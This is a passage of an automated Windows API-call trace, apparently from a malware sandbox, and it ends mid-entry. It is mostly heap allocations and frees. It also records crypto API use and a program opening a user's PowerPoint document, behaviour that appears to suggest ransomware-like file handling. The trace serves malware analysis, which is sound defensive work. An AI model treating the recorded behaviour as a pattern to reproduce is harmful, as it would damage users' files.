[0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9a8 [0033.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0033.034] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0033.034] CryptDestroyHash (hHash=0x7c2240) returned 1 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7758 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0033.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0033.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h3wz1pxdd.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.039] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.039] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0033.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 